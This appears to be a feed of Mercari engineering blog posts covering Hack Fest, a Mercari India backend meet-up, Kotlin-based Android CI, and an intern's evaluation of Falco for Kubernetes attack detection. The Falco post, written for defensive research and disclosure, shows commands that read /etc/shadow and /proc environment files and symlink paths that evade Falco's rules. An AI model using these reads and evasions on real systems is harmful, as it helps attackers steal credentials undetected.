From Autumn 2022, the event has been made more compact by changing the duration from one week to three days. Moreover, we also expanded the scope of participants which includes Souzoh in addition to Mercari JP, making it possible for people across Mercari Group to collaborate and exchange their ideas.

The event is now called Hack Fest because the purpose of this event is to have fun just like you are attending a festival. In Japanese, HACK FEST is referred to as　技術祭 (Gijutsu Matsuri), which can be literally translated as Technology Festival.

The Concept of Hack Fest 💡

In addition, one of the most important parts of Hack Fest is the new concept of "Unlimited Hacktivity" to clearly define the activities of the event. Participants can discover unlimited possibilities in the products, the company as well as unlock their hidden talents.

Expected Results 🎯

The ultimate goal we expect is to HAVE FUN!. By engaging in fun activities, it will automatically enhance engagement between our members which can bring about new ideas and increase innovations.

Also, as shown in “Hack Fest effects we expect" above, we are targeting that Hack Fest will have direct effects on product improvement that can lead to company growth.

Outline of the Event 👀

Hack Fest kicks off with opening ceremonies on November 9th and will run for 3 days through November 11th. For the first 2 days, people can concentrate on developing their ideas. There will be no regular meetings or tasks related to daily work in these 2 days.

The final day will feature “Show Case Day” where people can demonstrate the fruits of their labor to the panel of judges. The Judges will evaluate the best projects

Since Hack Fest will be commenced very soon, the Engineering Office will do its best to make the most compelling and meaningful Hack Fest ever! We will update you with the result of Hack Fest once it is done! Please stay tuned!

Mercari India Backend Team Intro Video at First-Ever Online Meet-Up!

Thu, 13 Oct 2022 19:29:28 GMT

Hello, everyone! I am Kayo, and I am responsible for Mercari India’s Employer Branding. On August 20th, we held the first-ever online meet-up in Mercari India. Over 50 members joined the meet-up in real-time, and we received many questions and comments. I’d like to thank everybody who took the time to be with us!

This is a summary of the first-ever online meet-up in Mercari India. The topic of this first meet-up was the introduction of Mercari Group’s Backend Team. The meet-up was also attended by backend engineers from Merpay, another Group company, who explained how backend development works in Merpay.

In this article, I’d like to share the presentations and the recording of the event. You can find out more about each of the teams from the documents. If you’re interested in Mercari India, please check it out!

1.Trust And Safety Backend Introduction

Trust and Safety (TnS) refers to monitoring, detecting, and handling prohibited behavior, including fraud, to ensure that Mercari users have a safe and secure experience. TnS in Mercari is not only implemented by the Customer Service (CS) Team which detects and handles such matters, but also by the TnS Team which is developing a platform that makes use of machine learning.

Speaker Comment

Trust and Safety as a platform provides content moderation of listed items, user comments and transaction messages between users, etc. It detects any violations or prohibited actions from users by using various automated approaches such as Rule based model, machine learning-based detection, etc. After detection of such actions, users causing nuisance are either warned or restricted to use the Mercari service and the content created by them is hidden. TnS team is providing such automated approaches to proactively detect violations and take actions to ensure a safe marketplace for customers.

Full Speaker Deck

2.Marketing Operations Backend Introduction

Marketing ops as a solution provides user segment, campaigns and incentive services to help tool consumers to design communication experiments and or incentive experiments.

Speaker Comment

Marketing Ops as a platform enables Marketers (tool consumers) to design strategies to incentivize users based on their actions. These actions could be in the past or in real-time. Using this tool Marketers run various incentivization programs and communication to engage users to the app, targeting the existing users as well as new users. It helps to promote more buying and selling actions which is an integral part of the overall Mercari app and thus enabling to boost the overall revenue of the company.

Full Speaker Deck

3.Merpay Backend Introduction

Merpay, Inc. was established in November 2017 as a fully-owned subsidiary of Mercari, Inc., with the goal of starting a new business related to finance. Using the technological know-how, vast user base, and foundation of data from the marketplace app Mercari, the company’s goal is not only to provide Merpay as a method of payment, but to create a new form of trust that could be used to provide various other financial services in the future.

Speaker Comment

Merpay as part of Mercari Group aims to provide circular finance for customers. Merpay has 3 focus areas: Payment, Credit, and Growing Wallet. Payment is one of the core parts of Merpay, handling millions of transactions, customers, and merchants has to be reliable, scalable, and consistent. Cash I/O is a team that connects and manages Mercari Group with financial institutions, mainly banks. Payment Platform is a team that manages the processing of all payments throughout Mercari infrastructure and external providers.

Full Speaker Deck

4.Mercari ID Platform Backend Introduction

The ID Platform Team is a dedicated team which provides the authentication and authorization platform for both Japan region marketplace and fintech services.
As a software engineer in the ID Platform Team, you will support Mercari Group’s growth with not only skills in the backend domain, but also expertise in the authentication and authorization domain.

Speaker Comment

Mercari Group is expanding into different businesses, starting from C2C eCommerce to Payment and now cryptocurrencies also. With each new endeavor, the requirement of having a versatile, strong, and yet user-friendly access control environment is needed. Also, as a big business, we have many partners to which our customers sometimes need to provide some data from Mercari in a limited manner.
To support these requirements, Mercari Group has a dedicated team ID platform team that manages the authentication and authorization infrastructure and provides access control to the internal, external, first party and third-party services.

Full Speaker Deck

We are actively recruiting members for our Backend Team right now. If you would consider working with us at Mercari India, go ahead and apply through the hiring page linked below! (The job postings may change from time to time.)
https://careers.mercari.com/hello-india/

Keep an eye out for more articles from Mercari India about what Mercari Group is up to. We will keep posting the latest information to our official LinkedIn, so please give us a follow there!
https://www.linkedin.com/company/mercari-india/

We’re also actively holding offline events at the office and sponsoring tech community events, so maybe our paths will cross in the future. Hope to see you at the next meet-up!

Leverage Kotlin in your Android CI

Thu, 13 Oct 2022 11:00:05 GMT

Hello, my name is Pierrick, and I’m a member of the Architecture Team at Mercari.

In this blog post, I will outline the multistep strategy we adopted over the years to transition our Android CI from being a mix of loosely coupled integrations to a consistent environment maintainable by any engineer familiar with Kotlin.

Android CI Context

One of the biggest CI projects in Mercari is the Android client application, where we are continuously improving the app and pushing weekly updates on the Google Play Store.

To keep a fast delivery speed, our CI is used in a variety of ways to ensure our codebase is not breaking and no regressions are introduced along the way.

Mercari CI usages

We are leveraging our CI primarily in the following two ways:

Hot path

The hot path is the common flow of CI tasks we’re running every time we push a change to our Android repository.

This is a time-critical path, because it will define how long our engineers will have to wait every time they’re pushing a new change before being able to merge it.

This is also a monetary-sensitive path, because our Android application, being a complex project, requires powerful machines to compile in an acceptable amount of time. Therefore, each additional minute we spend using these expensive machines is visible in the overall cost we’re paying for our infrastructure.

Since we spend most of our waiting time and money on the hot path, our improvements mainly focus on this workflow.

Automation of regular tasks

The second way we leverage CI is by running regular tasks that are needed to maintain our project. We have a lot of regular tasks including:

weekly autoupdate of our dependencies,
daily reminders of the next release schedule, and who will be the owner of the release,
etc.

Compared to the hot path we defined before, such tasks are not as time sensitive, because we’re running them early in the morning or during the weekend, when no one is actively waiting for their results. But they introduce new challenges, like monitoring or maintenance.

Since these tasks are triggered automatically, we risk forgetting them if they start failing silently when everyone is busy with more urgent tasks.

Even if we notice an error, solving the failure might be difficult because people may not be used to working with that part of our tooling. We may encounter more challenges if the error is based on a programming language our Android engineers have limited experience with, like Ruby or JavaScript.

Historical tech stacks

Our Android CI was originally maintained by the same people who were maintaining our iOS CI, and so Fastlane was used for most of the Android CI logic.

Fastlane is a popular solution in the iOS ecosystem. But since Fastlane is based on Ruby, we needed to support the Ruby language support, including linting, dependencies installation and updates. Due to a lack of knowledge and interest, Fastlane became an unmaintained part of our codebase and thus also brought in many unresolved security warnings.

We clearly lacked a strategy on how to maintain such automations, and an action-plan to converge to a coherent ecosystem. After some Android members volunteered to take over the Android CI maintenance, we had to define a strategy to replace unmaintained parts of our infrastructure with more Android-friendly technologies.

Kotlin was chosen as a replacement for all the existing scripting languages. But the migration had to be incremental, because we had limited resources and had to change parts of the CI while it was still being used by all our Android engineers daily. That’s how we ended up with our first iteration of Kotlin-based tooling.

First iteration: provide Kotlin-based automation with custom Docker images

To introduce gradual Kotlin power automation, the first idea was to provide our first Kotlin-based tooling with new custom Docker images.

We were able to provide the Docker images by creating a new, separate project called toolbox, which focused on maintaining Kotlin automation code and the Dockerfile files required to run them.

We used this approach for the following reasons:

More deterministic Docker image upgrades

Up to this point, the CircleCi team was updating the images that we were using, without clear visibility on when changes would happen and why. By building new images based on the CircleCI images, we were able to introduce a more explicit versioning on their releases, enabling us to control potential regressions.

FROM circleci/android:api-30

# Install toolbox
COPY ./kotlin-ci/build/install/kotlin-cli-shadow /mercari/kotlin-cli
ENV PATH $PATH:/mercari/kotlin-cli/bin

Extending an existing Docker image with a fat-jar is pretty straightforward.

We now had to regularly update our images manually, but this can be an advantage because we had started introducing changes in a predictable way.

Include Kotlin automation code in the Docker image

Because of the images we were using to build Android apps, we already had a dependency on the JVM. Thus, we could run the jar files of our custom Kotlin automation code without bringing in any new dependency.

The following are some examples of commands that we started distributing with this approach:

apk-publish: Publish an APK deploy message to a Slack channel + the related GitHub PR.
pr-comment: Post a message to a linked PR, if it exists.
slack-msg: Post a message to Slack.

Second iteration: bring automation directly into the Android codebase

The custom Docker image approach allowed us to experiment with writing Kotlin-based automation code. But since each update was tied to a new release of the related Docker images, we encountered a slow feedback loop.

At the same time, we investigated a new idea that would allow us to write automation code directly in the Android project. We decided to try out the Gradle’s JavaExec task type, which can run a Java or Kotlin program located in the Gradle project directly as a Gradle task.

But since our Android project is already big and has many Android-related dependencies, we wanted to avoid adding additional dependencies that engineers would have to resolve, even by those who just want to work on Android feature development.

To solve this issue, we created a new Composite Build based module that would host all our JavaExec powered integrations and only depend on Kotlin and a few other automation related libraries. This project would only be loaded on demand on local machines, and always on the CI.

// Only load scripts folder if required.
val includedScripts: String? by settings
if ("true" == System.getenv("CI") || "true" == includedScripts) {
    includeBuild("scripts")
}

In the settings.gradle.kts file, the scripts composite build is only included on demand via a specific Gradle property.

This new scripts module became a great place to host all isolated tooling that we wanted to expose locally, but only on demand, like code generation when creating a new module.

./gradlew -p scripts generateFeatureModule

The -p option allows us to run Gradle with a custom root project, instead of the current directory being the Android project.

With this new approach, we could completely replace several Ruby/Python scripts, while being even more integrated with the Gradle environment. With this integration, we were able to simplify the maintenance of said scripts because we could directly reference Gradle outputs (apk, test results) instead of hardcoding their paths in other scripts.

We noticed Android engineers were able to manage a Kotlin project much easier, bringing with them the habit of writing tests for each new addition, rather than standalone Python or Ruby scripts.

And last but not least, we could even refactor our initial automation code in the toolbox project mentioned in the first step. The idea would be to publish reusable code into a private maven repository that could be consumed not only in the main Android project scripts folder, but also in all other projects in the future that want to use similar automation in their CI flow.

Third iteration: embrace Kotlin Script for a pure scripting experience

We were reaching a pretty nice situation in our migration, gradually replacing even more of the existing Ruby or Python scripts in the Android project itself. But at some point, a particularly complicated Python script that had accumulated many features over time became the opportunity to try Kotlin Script in our Android project.

This script contains the logic calling the Firebase Test Lab service for our E2E tests, waiting for Android devices to complete their tests and publish the results to the pull request. Originally, the script was using the gcloud command to trigger the tests. With gcloud being implemented in Python, we decided at that time to write our integration in the same language.

Luckily, we had already moved to Flank, which is running on the JVM, so we were getting a chance to drop the Python dependency. Moving to Flank allowed us to rewrite this logic in Kotlin, and create stronger foundations for our future needs.

Kotlin Script seemed like a good choice for the following reasons:

Easy to run on a local machine and in the CI

All our execution environments require at least a JVM. For Kotlin Script, the only required extra dependency is a Kotlin installation.
Locally with SDKMan or homebrew:

# With homebrew
brew install kotlin

# With sdkman
sdk install kotlin

For the CI side, we needed to create a new Dockerfile providing a JVM + Kotlin installation to run our Kotlin scripts. Notice that with GitHub Actions, you can natively run Kotlin scripts without any additional setup, because the Ubuntu default image is coming with Kotlin by default.

Support for external dependencies out-of-the-box

Kotlin Script is a great choice when you have existing maven dependencies, because adding them is as easy as including an annotation in your script.

@file:Repository("https://repo.maven.apache.org/maven2/")
@file:Repository("https://example.org/maven2/")
@file:DependsOn("org.jetbrains.kotlinx:kotlinx-coroutines-core:1.6.4")
@file:DependsOn("com.mercari.test:testlab:1.0")

import com.mercari.testlab.runE2eTests
import kotlinx.coroutines.runBlocking

runBlocking {
    val results = runE2eTests(...)
    println("Results: $results")
}

Anyone who works with Python or Ruby knows the pain of having to prepare a virtual environment, relying on pip or bundler to install your script dependencies before running any non-trivial script. In the case of Kotlin Script, the workflow doesn’t change regardless of the fact that you’re having dependencies or not. Kotlin will make sure they are downloaded or reused from a local cache before compiling your script into a Java application. And this works without touching any build system like Gradle.

Considering this feature, Kotlin Script is the perfect candidate when you want to write glue code for business logic implemented in another repository, where you can then take the time to have a complete setup to write quality code (linting, testing, etc). Kotlin script could in this case be treated as a more maintainable equivalent to Bash.

Conclusion

This multistep effort of converting our existing esoteric scripts to a more consistent environment allowed us to remove a large amount of unmaintained code that was previously running in our CI. We also gained a more powerful CI that enabled us to create automations that we couldn’t confidently provide before.

Thank you for reading. We’re always on the lookout for new Android engineers, to contribute to our app and infrastructure.
If you are interested in working with us, check our careers page.

To dig even more into this topic:

this blog post is the written summary of a talk I gave in DroidKaigi 2022, you can find slides here.
A sample project showcasing these approaches is available here.

Restructuring the Kubernetes Threat Matrix and Evaluating Attack Detection by Falco

Tue, 11 Oct 2022 15:18:49 GMT

This article is a translation of the Japanese article published on September 30th, 2022.

I’m Hiroki Akamatsu (@hi120ki), an intern on Mercari’s security team.
I have been working in the Security Engineering Team (Introduction article), which is responsible for infrastructure security and other areas of security at Mercari. During my internship, I worked on the re-evaluation of runtime security monitoring tools for Kubernetes, mainly Sysdig Secure and Falco.

This article presents the following findings from the evaluation.

Findings of attack methods missing from the Threat matrix for Kubernetes published by Microsoft.
Contribution to the attack detection rules in Falco
Understanding Falco detection evasion methods and countermeasures
Understanding the Effectiveness and Limitations of Falco Attack Detection

In addition to the actual tasks performed, I would also like to share with you the perspective and working style required to work as a security engineer at Mercari that I felt during my internship. I hope this information will be helpful to those who are interested in joining the Security team at Mercari.

Introduction to Sysdig Secure, Falco, and scope of tasks

Falco is an open source software that collects system calls (syscalls) executed by the kernel module or eBPF and detects attacks according to predefined rules.
Rules managed as open source are published in the Falco repository on GitHub, and can detect access to critical files, suspicious program execution, and network access based on these rules.

Falco collects syscalls on the kernel, so it can collect activities executed by processes on containers. Therefore, it is known as a tool to detect attacks on containers and Kubernetes.

Sysdig Secure is a paid SaaS that provides additional security functions mainly based on Falco.

Mercari runs many of its services on Kubernetes (Google Kubernetes Engine) and has been using Sysdig Secure since 2020 to detect attacks on Kubernetes clusters and record traces of the attacks. At the time of implementation in 2020, Hiroki Suezawa(@rung) performed threat modeling and compared its functionality with other companies’ products before adopting it.
It has been two years since then, more Kubernetes security threat information is available, and new features have been added to Sysdig Secure. Therefore, we conducted threat modeling again to evaluate new features in Sysdig Secure and new open source Falco rules. We then created new rules to detect attack methods that are not covered by the existing rules found during our threat modeling, and implemented and verified these new rules in the production environment.

Mercari mainly uses Sysdig Secure, a paid SaaS, but with regard to the description of the detection engine from the section "Updating Falco’s Attack Detection Rules" of this article onward, I will present details based on the usage of the open source (Falco) on Sysdig Secure, and not specific to Sysdig Secure itself.

Threat modeling for Kubernetes clusters

Threat modeling is the process of identifying security threats to a system and is often performed when designing a system. In this case, however, we focused on a Kubernetes cluster that is already in operation and how an attacker intrudes and gains a foothold to attack the Kubernetes cluster.
Threat modeling for Kubernetes clusters is based on the Threat matrix for Kubernetes published by Microsoft. The Threat matrix is a list of attack methods from MITRE ATT&CK, a collection of cyber-attack methods, that are applicable to Kubernetes. It describes the attacker’s actions in the attack lifecycle of a Kubernetes cluster, starting with Initial Access, followed by Execution, Privilege Escalation, Credential Access, Discovery, and Lateral Movement.
In the threat modeling, we have supplemented the attack techniques that were missing in Microsoft’s Threat matrix for Kubernetes by referring to MITRE ATT&CK’s Containers Matrix and other sources as appropriate. For example, we have added the following additional attack methods: checking privileges after an intrusion, mounting a Container socket, adding Capability, which is a potential Container Escape risk, and executing a Container Escape Exploit.

The Threat matrix created by threat modeling based on the above looks like this.

The attack techniques marked in green have been added to the Threat matrix for Kubernetes by us and are detailed below.

Execution
- Debug by ephemeral container: If the attacker has access to Kubernetes, the new kubectl debug in addition to the existing kubectl exec allows arbitrary code execution in the container via an Ephemeral container.
Privilege Escalation
- Too many capabilities: The risk of container escaping is increased by granting a specific Capability to the container, such as CAP_SYS_ADMIN. If a container is escaped, An Attacker can perform operations on the host.
- Weak AppArmorProfile: Disabling the AppArmor profile, which restricts behavior inside containers, increases the risk of container escapes. A container escape allows an Attacker to perform operations on the host directly.
- Mount container socket: Mounting a Socket with access to the container runtime allows you to manipulate other containers and the host from inside the container
- Sharing Host Namespace: Sharing Host Namespaces such as Host Network and Host PIDs leads to privilege escalation from inside the container.
- Kernel exploit to escape container: Container escape through attack code exploiting kernel vulnerability, allowing operation on the host.
Credential Access
- Read process environment variables: If environment variables are leaked, various credentials like Cloud Secret Access Key and configuration values may be stolen making it possible to access other resources.
Discovery
- Checking pod settings inside container: Determine what permissions are granted to the container by examining the internal file system, etc.
- Install discovery tool outside container: Network scanning tools and other tools installed from the outside can lead to an investigation of the Kubernetes environment for infiltration escalation.

We also implemented attack code for each specific technique. We then compiled a spreadsheet containing the attack methods, the implementation, and other references so that anyone could reproduce and verify them simply by looking at the Threat matrix and the spreadsheet.

We aimed to cover all attack methods by conducting threat modeling and creating a threat matrix. One important thing to note is that an attacker would be using a combination of these attacks rather than just one; for example, they might attack via Initial Access, Execution, and Privilege Escalation methods to spread their attacks.
Thus, in updating Falco’s attack detection rules (described in the next chapter), we aimed to create a set of rules that would allow us to detect each phase of such an attack.

Updating Falco’s Attack Detection Rules

For our verification purposes, We executed each attack in the threat matrix on a Kubernetes cluster and checked whether Falco and Sysdig Secure could detect each of them. Based on the results, we created new rules for Falco and patched the existing rules where necessary.

An example of a new rule we created was a detection rule for the “Read process environment variables” technique that we added to the Threat matrix. This rule detects when processes read from /proc/self/environ and /proc/1/environ files; both files are accessed when reading the environment variables via SSRF or Path traversal vulnerabilities.
In many cases environment variables store important information such as credentials for accessing other resources and application configuration values.
In addition to the above, Linux provides files under /proc that allows programs to obtain various interface information. Particularly, it provides files in the form of /proc/[pid]/environ that allows programs to obtain the contents of environment variables for a specific process, specified by a pid.

For example, let us assume that a Pod was created with an environment variable containing some credential information using the manifest below.

kind: Pod
apiVersion: v1
spec:
  containers:
    - name: ssrf-poc
      env:
      - name: MY_SECRET
        value: 8c2886dca39e7b692cb378e704072ad4

If the attacker is able to read the contents of /proc/self/environ (note: here “self” is used instead of a pid to specify the environment variable for the current process), the confidential information MY_SECRET set in the Pod can easily be stolen.

KUBERNETES_PORT=tcp://10.24.0.1:443
KUBERNETES_SERVICE_PORT=443
...
MY_SECRET=8c2886dca39e7b692cb378e704072ad4

This rule should be useful in many environments, and so we have created a Pull Request to the Falco repository, which they have since merged. (Add new rule that detect retrieving environment variables from /proc files #2193 – Falcosecurity/Falco)

In addition, we created 8 other Pull Requests to fix bugs in the existing rules or to make them more robust. while working closely with the Falco team as we communicated.

Falco detection evasion via symbolic links, and countermeasures

We also investigated methods to evade Falco’s detection during our research on threat models and detection rules.
In particular, I paid attention to the file path detection evasion method using /proc/self/root in Symbolic link files introduced in Kohei Morita(@mrtc0)’s article "How to Bypass Falco".

When you perform an operation on a file in Linux, the openat system call is executed to open that file. The second argument to the openat system call contains a file path. For example, cat /etc/shadow command will invoke the following openat system call.

openat(AT_FDCWD, name=/etc/shadow, flags=1(O_RDONLY))

Falco can detect these system calls and also provides users with the filename being accessed. In the above example, the filename /etc/shadow will be stored in a variable named fd.name. Falco’s detection rules may use this to analyze the action and possibly raise a flag. For example, the “Read sensitive file trusted after startup” rule uses this fd.name variable to detect access to files containing potentially sensitive data.
However, one thing to note is that Falco tries to provide fd.name as an absolute path, which means that it will try to logically resolve relative path specifications such as . and ... For example, a path like /var/spool/cron/crontabs/../shadow will be resolved to /var/spool/cron/shadow which is then made available in the fd.name variable by Falco.

At this point we must consider the existence of symbolic links. A symbolic link is a link that points to another path. For example, in Ubuntu, /proc/self/root/ is a symbolic link to / (the root directory), therefore it is possible to specify the file /etc/shadow as /proc/self/root/etc/shadow: they will point to the exact same file. To find out the list of symbolic links on your system, you can execute the following command, and you will be presented with the list of available symbolic links.

# find / -type l -xtype d -ls 2> /dev/null
  1554024 0 lrwxrwxrwx 1 root root 9 Aug 15 11:50 /lib64 -> usr/lib64
       12 0 lrwxrwxrwx 1 root root root 13 Sep 15 04:36 /dev/fd -> /proc/self/fd

For our purposes, we are interested in symbolic links that point to certain “interesting” directories:

/proc/self/root -> /
/proc/self/cwd -> (process dir)
/dev/fd -> /proc/self/fd
/var/spool/cron/crontabs -> /etc/crontabs
/var/spool/mail -> /var/mail

Note that in the above example /var/spool/cron/crontabs actually points to /etc/crontabs. With this knowledge in mind, you might realize that the path /var/spool/cron/crontabs/../shadow actually points to /etc/crontabs/../shadow, which in turn resolves to /etc/shadow, as can also be seen in the following table.

Arguments of the openat system call	Falco’s fd.name	Actual file path to be accessed
/var/spool/cron/crontabs/	/var/spool/cron/crontabs/	/etc/crontabs
/var/spool/cron/crontabs/../	/var/spool/cron/	/etc/
/var/spool/cron/crontabs/../shadow	/var/spool/cron/shadow	/etc/shadow

However, when Falco reports on the cat /var/spool/cron/crontabs/../shadow command being executed, Falco only resolves the file path of the argument of the openat system call to /var/spool/cron/shadow and passes it to fd.name, without resolving the symbolic link. When an attacker uses this method, they can evade the “Read sensitive file trusted after startup”, as fd.name must match /etc/shadow exactly.

Using the same method we were also able to evade our newly proposed rule to detect reads against /proc/self/environ, by utilizing the fact that /dev/fd is a symbolic link to /proc/self/fd and specifying /dev/fd/../environ/ instead.

We have proposed to Falco a temporary solution to this problem as follows: First, as a temporary measure, we sent a Pull Request (Add rule to detect bypass by symlink files #2202) for a new rule to detect the use of directory traversal via symbolic links for specific links pointing to sensitive directories, which are present by default in widely used Docker images. However, this rule alone does not work for newly introduced or previously unknown symbolic links are used, especially when they come from other container images or are created by packages that the users installed. To solve this problem we have created a new issue to discuss Symbolic link paths in the generation of fd.name. This is still under continuous discussion under the Issue (Discuss about fundamental solution of detecting symlink file based bypass method #2203).

Limitations of attack detection by Falco and what to expect in the future

In this section, we will introduce our perceived effectiveness and limitations of Falco during our work, including the deployment of detection rules to Mercari’s actual production environment.
As mentioned at the introduction, Falco collects executed syscalls and detects them according to predefined rules.
This detection technique is very effective for attacks that always execute a specific syscall. For example, attacks that require access to specific well-known files or attacks that must access descriptors to make external communications are prime candidates However, this technique falls short when trying to detect following types of attacks.

Attacks that are completed within the application layer (i.e. no syscalls are made)
Attacks that use a combination of multiple syscalls, and thus cannot be identified by a single syscall

For attacks such as SQL injection that are completed within the application layer, it requires a fundamentally separate approach than syscall-based detection.

For attacks using multiple syscalls, while Falco is currently only capable of detecting single syscall-based attacks, we are hoping to see improvements to Flaco’s functionality that allows it to identify these attacks in the future. We also believe that Falco will benefit greatly if they can decrease the amount of false positives. Currently Falco detection has a high rate of false positives, and If Falco can reduce these by only raising alerts when a combination of multiple high-risk behaviors are identified, it should increase Falco’s usability even more.

Finally, we would very much like to see a way to prune multiple identical alerts. For example, when a Pod that contains a potential vulnerability is deployed at scale, we would be overwhelmed by the same alerts. At Mercari we have developed a mechanism to first intercept these alerts within a common monitoring platform, which then consolidates them before sending the alerts to responsible staff. It would be nice if a similar feature were to be implemented upstream.

My thoughts on the internship

One of the things that impressed me during this internship was the culture of the Mercari Security team. The team looked for attack methods that were missing from the Threat matrix for Kubernetes, created attack code to verify whether the existing Falco rules detected them correctly, and properly verified whether the code was "really safe”.

The team was able to analyze and investigate attack methods from multiple angles (and not just simply relying on a single source of information). They also took time to actually reproduce and verify attacks in a near real-world setting, and invested resources to evaluate/verify Falco’s abilities as well as other ways to evade its detection.

I was very impressed by the fact that we were able to do the above while not losing sight of our primary goal to provide safe and secure services.

I personally received a lot of support as I was working on this project and the team really supported me to gain a broader view of what we were doing. I was able to go beyond just the tasks within Mercari as we had opportunities to discuss with external experts and Sysdig’s Technical Account Manager to learn about Kubernetes security, and how Falco detection will look like in the future. We were able to proceed with the project smoothly as we had a clear understanding of the overall Kubernetes security model that we ultimately wanted to achieve and with this in mind, we were also able to proactively tackle challenging issues like Falco detection bypasses.

One of our values at Mercari is to "Be a Pro". Throughout my internship, I challenged myself to do just this. For example, I was able to draw from my experiences designing security CTF challenges (Ironhand) when tackling the environment variable read detection rule. In the end I was able to create 9 pull requests for Falco projects during my one and a half month internship, that resulted in myself being able to contribute to improving the overall Kubernetes security, and not only within Mercari.

Summary

It was a rewarding experience for me working to strengthen security measures at Mercari to provide safe and secure services. I would like to thank Hiroki Suezawa (@rung) for his mentorship, the Falco team for responding to Pull Requests and Issues, Sysdig for their support and information exchange, and external experts such as Chihiro Hasegawa, Kohei Morita(@mrtc0), and everyone who supported my internship.

If you are interested in joining the Security team at Mercari, please see the following link!

Security / Privacy at Mercari